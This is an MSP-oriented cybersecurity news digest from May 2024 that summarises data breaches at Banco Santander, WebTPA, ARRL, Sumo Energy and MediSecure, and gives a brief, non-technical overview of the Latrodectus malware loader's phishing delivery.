MSP cybersecurity news digest, May 31, 2024

Banco Santander warns of a data breach exposing customer info

Banco Santander S.A., with an annual revenue of €59.59 billion, announced a data breach affecting customers due to unauthorized access to a database hosted by a third-party provider. 

The breach impacted customers and employees in Spain, Chile and Uruguay, but did not affect transaction information or online banking credentials. The bank stated that immediate actions were taken to contain the breach, and additional fraud prevention measures were implemented.

The bank's systems in other regions remain unaffected, and services continue to operate normally. Banco Santander said it will notify affected individuals and law enforcement about the incident.

WebTPA data breach impacts over 2.4 million insurance policyholders

A WebTPA Employer Services (WebTPA) data breach disclosed earlier this month impacted close to 2.5 million individuals, according to the U.S. Department of Health and Human Services.

Some affected individuals are customers of major insurance companies like The Hartford, Transamerica and Gerber Life Insurance. WebTPA, a subsidiary of GuideWell Mutual Holding Corporation, discovered the breach in December, although it occurred in April 2023. 

The breach exposed personal data, including full names, contact information, birth dates and Social Security numbers. Financial account information and medical records were reportedly not compromised.

Latrodectus Malware Loader emerges as IcedID's successor In phishing campaigns

Researchers have observed a surge in email phishing campaigns since early March 2024, delivering Latrodectus, a new malware loader believed to be the successor to IcedID.

These campaigns typically use oversized JavaScript files to install a remotely-hosted MSI file via msiexec.exe, utilizing WMI. Latrodectus deploys additional payloads like QakBot and DarkGate, with features for enumeration, execution and self-deletion. It masquerades as legitimate software, uses obfuscation, and performs anti-analysis checks to avoid detection. Latrodectus establishes persistence with a scheduled task and communicates with a C2 server over HTTPS, allowing it to collect system information and execute commands.

Researchers suggest Latrodectus may be developed as a replacement for IcedID, noting its ongoing enhancements and deployment in various phishing campaigns.

American Radio Relay League cyberattack takes Logbook of The World offline

The American Radio Relay League (ARRL) announced a cyberattack disrupting its IT systems and online operations, including email and the Logbook of The World (LoTW).

As the national association for amateur radio in the U.S., ARRL represents amateur radio interests, provides technical advice and promotes events and educational programs. The attack affected several services, including LoTW and the ARRL Learning Center. 

ARRL assured members that no credit card information or Social Security numbers are stored, though private information like names, addresses and call signs are in their database. The nature of the cyberattack remains unclear.

Recent victims in Australia

Sumo Energy, an Australian electricity, gas and internet provider with over 31,000 electricity customers and about 8,300 retail gas customers, confirmed a data breach exposing customer credit scores, passports, driver’s licenses, and more via a third-party attack. 

The breach, involving a large volume of customer information and documents, was posted on a clear web hacking forum. The hacker, known as “OriginalCrazyOldFart,” shared links to Amazon web buckets where the data was stored. The sample data includes a nearly 1 GB zip file of customer electricity invoices and a 160 MB zip file of gas invoices. Sumo stated that the breach affected a third-party file storage application, not their own systems, and that it has since secured the application. They are notifying affected customers and providing support through IDCARE and Equifax credit monitoring. Sumo has informed authorities and is investigating further, urging customers to monitor for signs of fraud and identity theft. 

In a separate case, MediSecure in Australia shut down its website and phone lines following a ransomware attack believed to have stemmed from a third-party vendor. The breach has impacted personal and health information, though the extent is unclear. MediSecure, operating since 2009, provides digital tools for health care professionals to manage medications, and have issued millions of eScripts via private and state-backed systems. The company reported the breach to Australian regulators, including the Office of the Australian Information Commissioner. MediSecure is working with the National Cyber Security Coordinator to mitigate the impact and investigate the incident.